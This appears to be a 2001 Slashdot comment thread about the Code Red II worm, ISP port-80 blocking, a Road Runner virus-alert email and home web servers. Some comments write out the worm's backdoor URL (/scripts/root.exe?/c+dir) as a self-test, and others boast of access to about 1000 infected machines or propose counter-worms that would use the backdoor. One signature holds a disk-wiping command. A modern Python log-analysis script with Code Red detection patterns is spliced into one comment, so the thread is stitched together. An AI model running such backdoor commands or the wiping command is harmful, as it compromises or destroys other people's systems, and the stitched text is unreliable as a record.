  113. Roadrunner Outage by cei · · Score: 1
    I have AT&T Broadband at home (in Los Angeles) and yes, it seemed like port 80 was being blocked perhaps from Sunday until some point last night. Web browsers stopped functioning but other IP ports remained open.

    Didn't see any warnings on their site (connected from elsewhere) yesterday though. You'd think they'd give people warning, and their support phone number kept me on hold for hours on end...

    --
    This sig intentionally left justified.
  114. BIG NEWS: by AdamInParadise · · Score: 1

    The Internet is insecure!

    Sysadmins that don't apply patches get owned!

    Writing a virus is as simple as opening Word! (Yes I know Code Red is a bit more complicated, it's written in Delphi)

    Come on, this is completely predictable. What really amuses me is the fact that we haven't seen a really dangerous bug yet: something along the lines of Code Red, mixed with CIH (destroy motherboards), that formats each hard drive it encounters. Are virus writers responsible or what? This would make the Internet a lot more secure, one way or another. And yes, this is a Microsoft worm for God's sake!

    --
    Nobox: Only simple products.
    1. Re:BIG NEWS: by analog_line · · Score: 2, Insightful

      We won't see something that destroys hardware last too long, because destroying hardware doesn't promote the expansion of the virus. Something that slows you down but doesn't kill you outright is far more likely to stick around long enough to get spread. Code Red, Code Red 2, and other "worms" are far more virus-like than most "viruses". Melissa, SirCam, and the like are merely trojans. They require users to interact with them. Code Red, Code Red 2, and the original Internet Worm replicate of their own volition and go out and find other infectable systems so they can repeat the process. Sounds a lot more like a biological virus to me.

    2. Re:BIG NEWS: by interiot · · Score: 2

      AIDS infects others for many years, and then kills its host. Such a strategy is certainly feasible with computer viruses and worms. Some suggest that the only reason they haven't done that yet is that virus writers want the instant gratification of seeing their work on the front page news.

    3. Re:BIG NEWS: by AdamInParadise · · Score: 2

      Well, all viruses are not this kind...

      Look at Ebola: it can spread like crazy through the air and it kills its host in less than a week. In this case, the only solution is containment.

      Let's bet: how much time do we have left until we have to create compounds around "infected" portions of the Internet...

      --
      Nobox: Only simple products.
    4. Re:BIG NEWS: by brokenwndw · · Score: 1

      IANAV[irologist], but here's my two cents anyway.

      According to the CDC, Ebola is spread in the air in the laboratory but not, for practical purposes, in humans (yet). In the Africa outbreaks the disease was spread via contact with infected secretions and fluids.

      It's long been held that the best strategy for a virus is to be as benign as possible, so that the host lives on to spread the disease and (in the case of humans) doesn't seek treatment. It's not hard to imagine that computer viruses would evolve similarly (who knows how many sleeping viruses there might be out there?). On the other hand, sometimes you wind up seeing selection for certain damaging traits if those traits help the virus multiply. (In the biological world, for example, viruses spread through the water supply often cause severe diarrhea, which damages the host but improves the chances of infecting more hosts. In the computer world, well, I think Code Red is a fine example...)

      Does anyone know of attempts to use biological techniques to analyze or fight computer infections? I seem to remember something about a net-based immune-system like construction but I can't find it.

      --------

    5. Re:BIG NEWS: by TrollMaster5000 · · Score: 1

      Yes. And more power to the maker of the worm.
      Showing sysadmins that they should either

      1. Upgrade.

      2. Run a better OS...

      ...One that comes with the code, so they can actually SEE WHAT IS HAPPENING ON THEIR OWN SYSTEMS.

    6. Re:BIG NEWS: by Anonymous Coward · · Score: 0

      News flash: if it was showing sysadmins _anything_, it'd be gone by now. The reason it's still around is that people are too lazy to patch their damn servers, they'd rather sit around and wait for someone else to take care of the problem.

    7. Re:BIG NEWS: by well_jung · · Score: 1
      I have an immune system. It's called OpenBSD. AKA The Jimmy Hat OS. Ultra Sensitive and ribbed for her pleasure.

      --
      Carl G. Jung
      --
      "With one breath, with one flow, You will know Synchronicity" -La Policia
  115. netblock by psychalgia · · Score: 1

    We make a lot of home products at our company; you've probably used 5 or 6 or more in a lifetime. Our entire multi-billion dollar operation came to a halt today when our netblock was attacked by the NT4 servers and NT5 clients. I guarantee that none of those clients had the SP2 fix...

    --

    ________________________________________________

  116. In Poland too! by zdzichu · · Score: 3, Funny

    Polish Telecom, the biggest ISP down here, also announced that they will block traffic from 'infected' sites. Trying to connect to whitehouse server is taken as a proof of infection.

    --
    :wq
    1. Re:In Poland too! by ivan37 · · Score: 1

      Ahhhh...so this worm was released by the Polish government so that they could punish people if they decided they wanted more information about America!

    2. Re:In Poland too! by JediTrainer · · Score: 3, Funny

      Hmm... www.whitehouse.gov seems to have been hacked. It's a porn site!

      Kidding, kidding!

      --

      You can accomplish anything you set your mind to. The impossible just takes a little longer.
  117. Massive arp traffic by PoochieReds · · Score: 0, Redundant

    I just got home from work and saw the little light on my cable modem going nuts. I did tcpdump from my firewall box and I'm seeing MASSIVE amounts of arp traffic.

    Perhaps I'll call roadrunner and see about a refund for the crappy bandwidth I'm getting tonight ;-).

  118. Man, I wish... by Rimbo · · Score: 5, Insightful

    I wish that RoadRunner San Diego would do that! All they've done so far is to send two "Virus Alert" e-mails out to people, imploring them to install the patch if they run Win2k or WinNT.

    I really think that it's the responsibility of a machine's owner to lock down his/her system from attack. Ignorance of the rule is no excuse. If you put a machine on the net, and it's not secure, it becomes a danger for everyone.

    The easiest thing to do is to shut down the access to machines that are infected. That way, you have their undivided attention when they call you up and say, "My cable's not working!" You simply respond... "Yes, we shut it off, because you wouldn't take care of business."

    You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there.

    1. Re:Man, I wish... by blang · · Score: 5, Funny
      You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there.

      Sorry for being such a troll, but what makes you believe that this patch is the ultimate cure of IIS security bugs? You may not be lame, but you do possess an impressive threshold for pain.

      --
      -- Another senseless waste of fine bytes.
    2. Re:Man, I wish... by onepoint · · Score: 1

      You and me both. My log file has a total of 6000+ IP addresses that have hit my modem since Sunday afternoon.

      I did find something strange. 65 IP addresses hit my modem more than 90 times, mostly in a row. Also I have noticed that UDP (port 6970) and port 53 attacks are up.

      Anybody noticing similar stuff?

      ONEPOINT

      --
      if you see me, smile and say hello.
    3. Re:Man, I wish... by Anonymous Coward · · Score: 0

      "You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there."

      A properly configured IIS box with .ida/.idq extensions disabled is immune to the worm. If you are running IIS and have no idea how to remove it from its horrible out-of-box configuration, you are lame.

    4. Re:Man, I wish... by roystgnr · · Score: 2

      Sorry for being such a troll

      Well, we all have our off days...

      but what makes you believe that this patch is the ultimate cure of IIS security bugs?

      What makes you believe that this webserver is the ultimate cause of computer security bugs?

      Currently my own computer system is accepting untrusted input through (to name a few) openssh, samba, XFree86, pine, mozilla, and identd. I can recall installing security updates at least once over the past four years for all but the last two programs, and I may have forgotten a security update (or thought of it as a functionality update) for them.
      I'm sure you're happily using Apache and Sendmail; check your logs sometime. You see those 90% of users running IE and Outlook? Wanna guess how many of them are patched against the dozen remote root exploits that have been found in those client-side programs?

      Running a patched IIS may not be the epitome of anti-lameness, but it's far enough above the median internet shmoe that you might as well be friendly to the guy.

    5. Re:Man, I wish... by Anonymous Coward · · Score: 0

      Interesting moderation... mod up the replies but leave the original at 1. Morons.

  119. Code Red Self Test by staplin · · Score: 5, Interesting

    While out and about looking for the latest Code Red statistics, I found this link to a Code Red Self Test which is supposed to tell you if you are vulnerable, and if you have been infected.

    I don't know if it works, I don't have a Win boxen to test it on...

    1. Re:Code Red Self Test by Anonymous Coward · · Score: 0

      That test tends to report false positives.
      (better than false negatives, at least)

    2. Re:Code Red Self Test by Omerna · · Score: 2

      According to it I don't have it (and I know I don't) so it either works or is just going to provide everyone who DOES have it with a nice surprise.

      --


      No sig for you.
    3. Re:Code Red Self Test by The_Weevil · · Score: 2, Informative

      Lol.

      It isn't difficult to self test. Get your IP with winipcfg then type this in a browser:

      http:///scripts/root.exe?/c+dir

      If you download a directory listing, you're infected. Ohohoho. Practically all Win2k users I know are infected. How amusing.

      You may also find /scripts/shell.exe works too.

      Weevil.

      --
      ghaa.
    4. Re:Code Red Self Test by The_Weevil · · Score: 1

      hmm. and put your IP between all those slashes. /. cut it out. damn j00 /. :)

      --
      ghaa.
    5. Re:Code Red Self Test by Anonymous Coward · · Score: 0

      It reports that both my WinME box and my Win2K box are infected. I know they aren't, so there has got to be something going on with my firewall then... I'm going to check this dumb thing from my Linux boxes across town, we'll see...

    6. Re:Code Red Self Test by chowpalace · · Score: 1

      NOTICE TO W2K users: winipcfg does not work. Go to a DOS box and type ipconfig /all, then fill in your IP addy after http:// e.g. http://255.255.255.0/scripts/root/exe/c+dir. If you get a connection refused you are probably good to go.

    7. Re:Code Red Self Test by Anonymous Coward · · Score: 2, Funny
      Gotta make it easier for the dumbasses that don't patch their server.

      http://127.0.0.1/scripts/root.exe?/c+dir

    8. Re:Code Red Self Test by psychalgia · · Score: 1

      So both my WinME machine across town and Redhat machine report they are clean; it's gotta be something with my firewall then... anyone got any ideas?

      --

      ________________________________________________

    9. Re:Code Red Self Test by osgeek · · Score: 3, Funny

      How about if someone just writes a Code Red version that instead of doing something nefarious just puts up a dialog that says: "Hey, you fucking moron! Patch your crappy IIS server so that you don't get some version of Code Red."

      Better yet, why not just run the patch installer for them?

  120. Cutting off port 80? by yerricde · · Score: 2

    AT&T's residential broadband division (MediaOne) has cut off port 80 across their network

    Seeing as how HTTP runs on port 80, how are outgoing HTTP connections (i.e. web page pulls) supposed to proceed across the network? Given that frontends to mail, newsgroups, and file transfers are increasingly HTTP-based, they might as well just schedule total network downtime during Code Red attacks.

    --
    Will I retire or break 10K?
  121. Cutting off port 80 by Grim+Grepper · · Score: 5, Interesting
    I really hope that RoadRunner doesn't decide to cut off port 80, as I happen to be running a webserver. Since I don't use IIS or Windows, it seems unfair that they would cut me off; it doesn't seem quite fair.

    What they should do is scan for people running IIS webservers and cut them off. Leave the Apache users alone!

    1. Re:Cutting off port 80 by interiot · · Score: 1

      Can you change the server's port to another port, say 8080? Or do you have quite a few links to the server?

    2. Re:Cutting off port 80 by Twilight1 · · Score: 1

      Actually, if you check your Acceptable Usage Policy, you will probably find that you are not allowed to run servers on your connection. I have always avoided any ISP that prevented me from fully utilizing my connection.

      I just think it's rather amusing to see a bunch of people complaining about a service blocking access to something that they weren't supposed to be doing in the first place. Did you read your AUP and Terms of Service before you signed up? No? Tsk tsk...

      -Twi

    3. Re:Cutting off port 80 by gad_zuki! · · Score: 2

      Well you are breaking policy, if they didn't want your money you'd probably be kicked off by now. O

    4. Re:Cutting off port 80 by Anonymous Coward · · Score: 0

      Verizon allows for servers for anything you want, with the caveat that they have to be 'low bandwidth'. As long as you stay under their (undefined) threshold they don't care. A moot point now tho, since they're ingress filtering port 80.

    5. Re:Cutting off port 80 by Anonymous Coward · · Score: 0

      If you check the AT&T Roadrunner subscriber agreement, you will see that it only mentions running those services for commercial purposes. As long as you are not reselling/redirecting traffic, it's perfectly legal to run your own servers.

    6. Re:Cutting off port 80 by jfunk · · Score: 2

      He said RoadRunner. If it's anything like my RoadRunner setup, he's allowed to run web and FTP servers as long as he notifies them (to open up the ports on the cable modem).

      In fact, I just wiped my webserver and I'm doing a major upgrade on it right now.

    7. Re:Cutting off port 80 by bk1e · · Score: 1

      I read my AUP and terms of service before signing up. Then Road Runner demonstrated that they are incapable of keeping mail servers up and running, so I started running postfix. This mail server was a gateway to harder servers; pretty soon, I was all strung out on thttpd. It was crazy, man.

      I have always avoided any ISP that prevented me from fully utilizing my connection.

      Unfortunately, I don't have as many choices as you. The only legitimate option I have is to pay insane prices for "business" 28.8k dialup service, since I can't get IDSL, ADSL, or SDSL. Road Runner is the only broadband service that will connect me.

      Anyway, the AUP/TOS haven't been a problem before, since the local RR admins tend not to care about servers unless they are bandwidth hogs.

    8. Re:Cutting off port 80 by Sc00ter · · Score: 5, Informative
      HEY! It's not against their AUP to run a web server!

      From: http://help.broadband.att.com/subagreelease.jsp

      (b) FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer.

      And the actual AUP page doesn't mention it at all: http://help.broadband.att.com/faq.jsp?content_id=72&category_id=34

    9. Re:Cutting off port 80 by iammichael · · Score: 1
      I don't use RR, but my mom does. She called me after receiving an email from Road Runner, frantically asking me what she needed to do. She was worried she was spreading this new "virus." They probably would have mentioned that they were planning on shutting down port 80 since they were already sending out a mass email on this topic.

      Here's a copy of that customer email:
      ----- Original Message -----
      From: <security@cfl.rr.com>
      To: <Our Valued Customers>
      Sent: Tuesday, August 07, 2001 9:21 AM
      Subject: Security Notification

      ROAD RUNNER ALERT

      VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

      Dear Road Runner Subscriber:

      Road Runner, like many other ISPs and, indeed, the entire Internet, has experienced an attack on its network that apparently is attributable to a strain of the Code Red virus. It is possible that this virus has infected the PCs of Road Runner customers using the Microsoft Windows NT Server or Microsoft Windows 2000 Server operating systems. Infected PCs may continue to flood the Internet and the Road Runner network with virus-generated messages (even without your being aware of it).

      Road Runner is working to alert all of its subscribers to this problem and to instruct them on where to find and install the patch necessary to eliminate the virus. In the meantime, Road Runner customers may experience slow network response, flashing data lights on their cable modems, and other symptoms (such as unusual port scan log activity or increased firewall activity) while Road Runner and the Internet community work to control the impact of this virus.

      IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER, PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE (www.microsoft.com/security) AND RESTART YOUR PC.

      IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOU ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

      We ask for your patience while Road Runner continues to work with the Internet community to address this virus.

      Thank you.

      Road Runner Security

    10. Re:Cutting off port 80 by Fizzlewhiff · · Score: 1

      That's exactly what I did but a day late. AT&T should have at least sent warning to subscribers that this was going to happen. Last week AT&T decided to change my email domain without telling me. This week they block incoming port 80 requests. What will this do for them in the long term? I think what we'll see is the next Code Red flooding ports used by MSN and AOL messenger so the ISPs will block those ports as well.

      --

      'Same speed C but faster'
  122. "Medium" Damage by turbodog42 · · Score: 1

    From Symantec's website:

    Damage
    The damage component measures the amount of harm that a given threat might inflict. This measurement includes triggered events, clogging email servers, deleting or modifying files, releasing confidential information, performance degradation, errors in the virus code, compromising security settings, and ease by which the damage might be fixed.


    In terms of what it does locally (ie doesn't erase your entire harddrive), medium damage isn't that far out of line.

    Maybe they should add a Mainstream Media Hype rating...

    1. Re:"Medium" Damage by JoeBuck · · Score: 2

      Oh, come on. You say that it doesn't erase your entire harddrive. Rather, it tells the entire net "Hey everyone! I am an infected computer, you can run any command you want on me!".

      For example, my web log (and everyone else's web log) has the hostnames or IP addresses of dozens of infected systems. It would be a trivial matter for me (or anyone else) to now erase the hard drives of any of these machines, or just to browse through the entire hard drive and take what I want and trash the rest.

      Or even better: use the back door to install a new Trojan that will still be present even after the owner applies Microsoft's patch.

    2. Re:"Medium" Damage by turbodog42 · · Score: 1

      True enough, but the sequence of steps you mentioned is doable, but definitely non-trivial. The average script kiddie would have to put out a lot of effort to accomplish all that.

      If code red did, automatically, trash your hard drive and rewrite index.html to read "th3 b3st l33t hax0r 0wns j00 - t0m landry m1ddl3 sk00l rulez!!!!", well then that would be high...

    3. Re:"Medium" Damage by Anonymous Coward · · Score: 0

      I agree that someone could easily do a lot of damage to an infected host. However...

      due to the sheer number of backdoors that are now out there, it is likely that the vast majority of them will go unused.

      (Also, people who haven't bothered to fix their system by now generally don't have anything very interesting anyway. The most you could get would be some credit card numbers and nudie pix... there's no shortage of either of those on the internet.)

    4. Re:"Medium" Damage by Anonymous Coward · · Score: 0

      Someone somewhere must be working on a version 3 that systematically causes serious damage to all these vulnerable machines. I give at most 48 hours before someone adds the final touches and releases it into the wild. It's human nature. It only takes one guy out of the millions who know how. Those boxes are doomed sooner or later.

  123. It _is_ quite benign. by Hobbex · · Score: 3, Interesting


    Besides the load of the spread (which is probably made significantly better by having the worm mostly scanning on its own subnet) CodeRed2 is quite benign.

    Yes, it does open a remote root exploit, but the servers that got infected were already wide open due to the default.ida hole. Sure, it's easier now, but since there are simple exploits for default.ida already, any script-kiddie worth the name could already have walked straight into these computers.

    In truth, I figure that the people who have made most use of this exploit have been geeks who would ordinarily never break into systems, but have been made curious about where the worms are coming from (of course, _I_ would never do such a thing... really...)

    1. Re:It _is_ quite benign. by maunleon · · Score: 2, Insightful

      The problem really is that it opens you up, then it broadcasts it to all your neighbors. Kinda like breaking your door down and putting a "Help Yourself" sign in front of the door.

  124. Worse, much worse by digitalhermit · · Score: 1

    Remember reading in high school biology that getting cowpox would confer a resistance to smallpox? I wished more IIS servers had gotten hit with Code Red I and forced them to patch. On my tiny little site I'm getting over two hundred unique requests for default.ida every half hour. I guess that this is because of my IP address being in the DSL neighborhood.
    Lots and lots of the machines I checked have the default IIS page. This may mean that the owners don't know they're running a web server (thanks to default installs) or are home users reading about this new Code Red II and thinking, "Hmm... I'm glad I'm not running a server." I've only seen a small percentage of duplicates too, so the rate of infection is definitely high.

    1. Re:Worse, much worse by Anonymous Coward · · Score: 0

      I have a high number of duplicates, as many as 15 from some hosts...

    2. Re:Worse, much worse by digitalhermit · · Score: 1

      The dupes are starting to climb, but are still less than 5% of the hits. I took a peek at a few of the addresses that are hitting my site and found that the majority are unconfigured (non scientific testing -- just cutting and pasting IPs).
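      As an added example (not code from any poster on this page), the following Python script does the counting several posters above did by hand from their log files: it parses Common Log Format lines, classifies /default.ida requests carrying the worm's %u-encoded payload as Code Red probes, tallies them per day and per source address, reports the duplicate fraction and the sources that hit repeatedly, and separately counts requests for the /scripts/root.exe and /scripts/shell.exe backdoor paths mentioned in the self-test thread. The log lines are constructed for the example, with source addresses from documentation ranges.

```python
"""Count Code Red probes and backdoor requests in a web-server access log.

The parser expects Common Log Format (the format Apache writes by default).
All sample lines below are constructed for this example; the addresses come
from the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24).
"""
import re
from collections import Counter

# host ident user [day:time zone] "method path protocol" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>[^:\]]+):[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# The worm's request line: GET /default.ida?<long run of X or N>...%uXXXX...
# The filler run overflows the .ida ISAPI filter; the %u escapes carry the payload.
PROBE_RE = re.compile(r'^/default\.ida\?[XN]{20,}.*%u[0-9a-fA-F]{4}')

# Requests for the command-shell copies Code Red II leaves behind.
BACKDOOR_RE = re.compile(r'^/scripts/(?:root|shell)\.exe', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_code_red_probe(path):
    return PROBE_RE.match(path) is not None


def is_backdoor_request(path):
    return BACKDOOR_RE.match(path) is not None


def summarise(lines, repeat_threshold=3):
    """Tally probes per day and per source; flag sources seen >= repeat_threshold times."""
    per_day = Counter()
    per_ip = Counter()
    backdoor = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue  # unparseable or not a GET: ignore
        if is_code_red_probe(rec["path"]):
            per_day[rec["day"]] += 1
            per_ip[rec["ip"]] += 1
        elif is_backdoor_request(rec["path"]):
            backdoor += 1
    total = sum(per_day.values())
    unique = len(per_ip)
    return {
        "total": total,
        "unique_sources": unique,
        # share of probes that came from a source already seen (0.0 when no probes)
        "duplicate_fraction": (total - unique) / total if total else 0.0,
        "per_day": dict(per_day),
        "repeat_sources": {ip: n for ip, n in per_ip.items() if n >= repeat_threshold},
        "backdoor_requests": backdoor,
    }


def _probe(ip, day, hour):
    """Build a constructed Code Red II style probe line (payload shortened)."""
    filler = "X" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a"
    return (f'{ip} - - [{day}:{hour}:00:00 -0400] '
            f'"GET /default.ida?{filler} HTTP/1.0" 404 287')


# Constructed sample log: one source probing three times, two others once each,
# one normal page request, one backdoor request, and one line that does not parse.
SAMPLE_LOG = [
    _probe("192.0.2.10", "04/Aug/2001", "10"),
    _probe("192.0.2.10", "04/Aug/2001", "10"),
    _probe("192.0.2.10", "04/Aug/2001", "11"),
    _probe("198.51.100.7", "04/Aug/2001", "12"),
    _probe("198.51.100.23", "05/Aug/2001", "08"),
    '203.0.113.5 - - [05/Aug/2001:09:15:00 -0400] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.5 - - [05/Aug/2001:09:15:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    report = summarise(SAMPLE_LOG)
    for day, n in sorted(report["per_day"].items()):
        print(f"{day}: {n} probes")
    print(f"total {report['total']}, unique sources {report['unique_sources']}, "
          f"duplicate fraction {report['duplicate_fraction']:.0%}")
    print(f"repeat sources: {report['repeat_sources']}")
    print(f"backdoor requests: {report['backdoor_requests']}")
```

      To run it over a real log, pass `open("access_log")` to `summarise` in place of `SAMPLE_LOG`.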

  125. Someone should update that Everything entry. by JeffHunt · · Score: 1

    I think it's great how there was the link to give the definition of Code Red in the story, but nobody had actually given the contextual definition.

    --

    "It was hell!" recalls former child.

    1. Re:Someone should update that Everything entry. by Sokie · · Score: 1

      http://www.everything2.com/index.pl?node_id=1126739&lastnode_id=1037487 is where they really want to link that definition to. I think everything moved Code Red Worm to its own node instead of making it a definition of Code Red.

      --
      ------
      Where are the slash-groupies? I distinctly remember being promised slash-groupies!
  126. AT&T Broadband.. by Anonymous Coward · · Score: 1, Informative

    ..has DEFINITELY shut off inbound port 80 traffic to some (if not all) of their cable modem infrastructure. I am in Massachusetts, and I'm cut off. The roadrunner.* newsgroups are boiling over this, and there's been NO official release from AT&T, although their customer support reps readily admit that 80 is off and will remain off, presumably indefinitely. I am bullshit about this, but have nowhere to go. DSL is collapsing while AT&T is getting bigger. Behold the fruit of two monopolies: AT&T and Microsoft.

    1. Re:AT&T Broadband.. by Anonymous Coward · · Score: 0

      Just put your site on a different port if you still want people to access it...

  127. It is only Medium DAMAGE! by thufir · · Score: 2, Insightful

    I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage.

    Maybe because they don't! You are thinking in terms of a security hole. With a virus it is different; you are more concerned about data loss.

    A virus can inflict low damage, ie: print a message on the screen that you are stupid, or a high DAMAGE rate of deleting your whole hard drive. Medium is a good measurement of this one, as it only has the POTENTIAL for data loss.

    1. Re:It is only Medium DAMAGE! by Anonymous Coward · · Score: 0

      If Symantec was concerned about security, they would realize that once a trojan is installed, you MUST assume that your data is lost, because you have no idea what other things may have been affected -- If you have a vulnerable machine hooked up to the Internet, how can you possibly know that the information stored is good?

  128. Create a Good Virus? by nicoz · · Score: 1, Redundant

    Why not create a good virus to interact with Code Red and force it into a benign state?

    Is this possible?

    1. Re:Create a Good Virus? by Anonymous Coward · · Score: 0

      Possible, yes, but you'd still potentially get in trouble with the law.

    2. Re:Create a Good Virus? by Amerist+A'Toll · · Score: 2, Insightful
      Taking into account that someone else has already mentioned the concept of Code Blue, i.e. a reverse-infecting worm that takes over Code Red boxes and renders them non-scanning and prevents reinfection. This could be quite possible -- but there are many ethical concerns, and if not that, the creator of Code Blue, should they be caught and not the progenitor of Code Red, may take all of the heat anyway.

      Amerist A'Toll

      --
      "What are dreams when we are but the dreams of dreamers yet to be born?"
    3. Re:Create a Good Virus? by Anonymous Coward · · Score: 0

      Instead of a virus (which spreads itself, and is illegal), why not a "patch" that simply detects an intrusion attempt by Code Red 2, and responds by using the backdoor to run something like 'net stop' or something else that would be hard to ignore on the infected machine. The more machines you had running this patch, the more likely it would be that you would hit one of these machines by random chance.

    4. Re:Create a Good Virus? by Anonymous Coward · · Score: 0

      In yesterday's Code Red story I saw:

      Re:Apache users Create default.ida 5mb!!!! (Score:3, Interesting) by Anonymous Coward on Sunday August 05, @06:16PM PDT Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

      It's entirely possible to modify this script to connect back on port 80 instead of 25. You've got a root shell on their box; the good (or evil) that can be done after that is limited only by your imagination and knowledge of winboxes.

  129. It's about time... by sfe_software · · Score: 0, Redundant

    I agree that cable users are causing the most damage from what I can see. I wish Road Runner (Time Warner Cable) would cut off port 80 as well. I'm logging thousands of attempts from other RR users on my firewall.

    My webserver is also logging in the hundreds, mostly from various cable and DSL users. Personally I think it would be nice if they could re-enable port 80 on request for those who actually need it, but unless you're a business customer, I would think blocking port 80 temporarily would be for the greater good...

    BTW, visiting most of the Road Runner IPs I'm logging, most of them don't have a page up at all. I get an IIS error about there being no "default" page... IOW, I suspect these users have no idea that they're even running IIS, much less that they're infected. Others show a page saying that too many connections are open (is this some sort of artificial limit in IIS, which depends on the license you've purchased, or is it actually an overload condition? Or an OS limitation?)

    It seems like the cable networks should let their users know (this could easily be automated: "Dear Customer, you are infected with Code Red, go here...")

    Besides, these people are killing my ping times in UT :)

    --
    NGWave - Fast Sound Editor for Windows
    1. Re:It's about time... by Anonymous Coward · · Score: 0

      NT Workstation/2000 Professional does have a connection limit (of 25?) on the webserver.

    2. Re:It's about time... by Waffle+Iron · · Score: 3, Insightful
      I fear that at the end of the day, one of the casualties of this worm will be home-hosted web servers of any kind. IIRC, most cable modem contracts forbid running servers. However, as far as I can tell, this policy hasn't been enforced.

      I'll bet that it gets strictly enforced from now on, killing all the fun even for people like me who run Apache on OpenBSD.

    3. Re:It's about time... by sfe_software · · Score: 1

      I do sympathize with those who like to run webservers on their home systems. I'm always torn on these issues. For one, most users running servers are doing so quite innocently, but OTOH if the contract says no servers, they have every right to block port 80, especially when there's such a good reason.

      This reminds me of the port 25 issue. I used to get so mad when an ISP would block outgoing mail, but with the massive amount of spam I receive each day, I almost think more ISPs should block port 25...

      BTW, -1 Redundant, that doesn't make sense considering it was one of the first comments posted... or is it that someone disagrees with me, and modded me down unfairly?

      - Jman

      --
      NGWave - Fast Sound Editor for Windows
    4. Re:It's about time... by Anonymous Coward · · Score: 0

      What you said about most not even knowing they have a webserver up is very true. At my school, which is mostly business oriented, every other person has a laptop and some version of Windows 2000 on it, and not much on it besides AOL and PowerPoint. After all, they are "power users." cough.

      I don't know whether W2K Pro or Advanced Server install IIS by default. But if they do, the users most likely are clueless about this.

      And it would suck for everyone to be denied running a webserver if only to host a resume, or work on a php/MySQL page to show off to others. I know that it is against the contract, but how many times has an ISP broken their part by limiting your bandwidth, etc. Australian Telecom being the best example.

      In the end, this lumping in of IIS servers under any and every type of server will do a great injustice to everyone.

  130. Kind of scary by Yorrike · · Score: 1
    It's weird. I have a list of about 1000 machines in my Apache log that I can just log into via root.exe.

    1000 machines! If this is phase 1, and phase 2 is a massive dDOS attack, the internet is in for a rough ride.

    I've refrained from logging into any of those boxes, but the more the attacks roll in, the more I feel I have to do something (like bitch slap anyone stupid enough to run an unpatched IIS, or IIS full stop for that matter).

    Bringing up the websites of the infected machines is always good. One of the machines in my blacklist was touting "Advanced Network Security Training". I'm still giggling at that one :)

    --

    Looks can be deceiving. Or CAN they?

  131. Road runner's "warning" by EvlPenguin · · Score: 3, Informative

    I received an email today from Road Runner (aka Time Warner Cable) regarding the "VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED". For the intrigued, here's the letter:
    ------
    VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

    Dear Road Runner Subscriber:

    Road Runner, like many other ISPs and indeed the entire Internet, has today experienced an attack on its network which is apparently attributable to the Code Red virus. It is possible that this virus has infected the PC's of Road Runner's subscribers using the Microsoft Windows NT or Microsoft Windows 2000 operating systems. Infected PC's may continue to flood the Internet and Road Runner's network with virus generated messages (even without your being aware of it).

    Road Runner is working to alert all of its subscribers to this problem and to instruct them on where to find and install the patch necessary to eliminate the virus. In the meantime, Road Runner subscribers may experience slow network response, flashing connectivity lights on the cable modem, and other symptoms (such as unusual port scan log activity or increased firewall activity) while Road Runner and the Internet community work to control the impact of this virus.

    IF YOUR PC IS RUNNING WINDOWS 2000 OR WINDOWS NT, PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE (www.microsoft.com/security) AND RESTART YOUR PC.

    IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOU ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

    We ask for your patience while Road Runner continues to work with the Internet community to address this virus. Thank you. Road Runner Security
    P.S. Please, do not reply to this message
    --------

    Well, gee, if the whole "internet community" is at work at resolving the issue, I can rest easy. But then again, they only say no to worry if you're running Windows 95, 98, ME or MacOS. Well, I'm running Linux and NetBSD, so I guess I should be worried, eh?

    --

    --
    #nohup cat /dev/dsp > /dev/hda & killall -9 getty
    1. Re:Road runner's "warning" by Anonymous Coward · · Score: 0

      Too bad they forgot to tell the user to install the patch after they downloaded it, before they told them to reboot.

    2. Re:Road runner's "warning" by Anonymous Coward · · Score: 0

      The worst part is that they didn't tell them their box had been r00ted and they should probably reformat.

    3. Re:Road runner's "warning" by Anonymous Coward · · Score: 0

      omg... you're right. Those morons :)

    4. Re:Road runner's "warning" by sharkey · · Score: 3, Funny

      But then again, they only say no to worry if you're running Windows 95, 98, ME or MacOS. Well, I'm running Linux and NetBSD, so I guess I should be worried, eh?

      No, you should report them to "abuse@timewarner.com" for sending you Unsolicited Bulk Email advertising those products.

      --

      --
      "Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
  132. Cutting Off Port 80? by Bonkers54 · · Score: 2, Informative

